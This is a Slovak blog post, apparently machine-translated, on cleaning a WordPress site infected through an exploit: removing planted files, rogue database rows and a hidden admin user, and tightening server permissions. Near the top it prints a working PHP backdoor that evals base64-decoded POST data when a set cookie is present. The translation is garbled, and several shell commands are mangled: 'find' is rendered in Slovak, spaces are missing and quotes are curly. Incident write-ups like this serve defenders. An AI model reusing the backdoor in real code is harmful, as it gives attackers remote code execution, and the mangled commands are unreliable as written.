WordPress Exploit - Vyčistite vírusové súbory, SQL a zabezpečenie servera.

Než budete čítať tento príspevok, mali by ste vidieť príspevok tu, Ak chcete niečo pochopiť. :)

Našiel som ho v niekoľkých súboroch blogu dňa stealthsettings.com, kódy podobné tým nižšie, ktoré sa objavili v dôsledku vírusu s výkon WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

Ak je to uvedený súbor xmlrpc.php z ospalýAle v grep server, môžete vidieť, že existuje pomerne málo svojho druhu v zdrojovom kóde.

Čistenie infikovaných súborov:

Ooookkkk ...
1. Najlepším riešením, po tom, čo zálohovanieA vyčistiť databáze je utrieť súbory WordPress (súbory wp-config.php a súbory, ktoré priamo nesúvisia s platformou wp, si môžete po ich dôkladnej kontrole ponechať) a nahrať ich pôvodné z verzie 2.5.1 (Počas tohto prevedenia WP verzia upgradu :)) http://wordpress.org/download/ . Utrite vrátane tematických súborov, ak nechcete veriť, že ich starostlivú kontrolu.

Zdá sa, že boli postihnuté a súbory tém, ktoré neboli použité predtým na blogu a jednoducho zmeniť tému, nerieši problém.

./andreea/wp-content/themes/default/index.php:

2. Vyhľadávanie a zmažte všetky súbory, ktoré obsahujú: * _new.php, * _old.php, * Jpgg, * GIFF, * Pngg a súbor wp-info.txt, ak existuje ....

Nájsť. -name „* _new.php“
Nájsť. -name “* _old.php”
Nájsť. -name "* .jpgg"
Nájsť. -name “* _giff”
Nájsť. -name “* _pngg”
Nájsť. -name “wp-info.txt”

3. v / Tmp , Vyhľadávanie a mazanie zložiek, ako je tmpYwbzT2

SQL odevov :

1. v tabuľke tabuľke wp_options zistiť, či tam je vymazať riadky: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Všetko vo wp_options, ísť do active_plugins a mazať, ak je plugin, ktorý skončí v jednom z rozšírenia * _new.php, * _old.php, *. jpgg, *. GIFF, *. pngg alebo ak ďalšie rozšírenie je podozrenie, starostlivo skontrolujte.

3. V tabuľke wp_users, Pozrite sa, či je používateľ, ktorý nemá nič nenapísal vo svojom práve, stĺpec user_nicename. Vymažte tohto používateľa, ale zapamätajte si číslo v stĺpci ID. Tento používateľ pravdepodobne použije „WordPress"Ca user_login a zdá sa byť vytvorený na 00: 00: 00 0000-00-00.

4. Prejsť na tabuľky wp_usermeta a odstrániť všetky riadky patriace ID vyššie.

Po vykonaní tohto vyčistenia sql zakážte a potom aktivujte akýkoľvek doplnok. (v blogu -> Dashboard -> Pluginy)

Zabezpečený server:

1. Pozrite sa, čo adresáre a súbory sú "zapisovateľný"(chmod 777) a skúste vložiť a chmod čo už nedovolí ich písanie na žiadnej úrovni. (chmod 644, napríklad)

Nájsť. -Perm-2-ls

2. Pozrite sa, čo súbory majú nastavený bit suid alebo sgid . Ak nechcete použiť tie súbory, ktoré na ne chmod 0 alebo odinštalovať balíček, ktorý obsahuje. Sú veľmi nebezpečné, pretože oprávnenie EXECUTE "skupina"Alebo"koreň"A nie s normálnymi užívateľskými privilégiami na vykonanie tohto súboru.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Skontrolujte, ktoré porty sú otvorené a pokúsiť sa uzavrieť alebo zabezpečiť tie, ktoré nie sú používané.

netstat-| grep-i počúvať

O tom. Vidím Niektoré blogy sú zakázané de Google Search a iní hovoria "Urobil ich dobre!!!" . No ja by som to pre nich urobil... ale čo poviete, ak Google začne banovať všetky weby formujúce  IS SPAM a dal trójske kone (Trojan.Clicker.HTML) v cookies?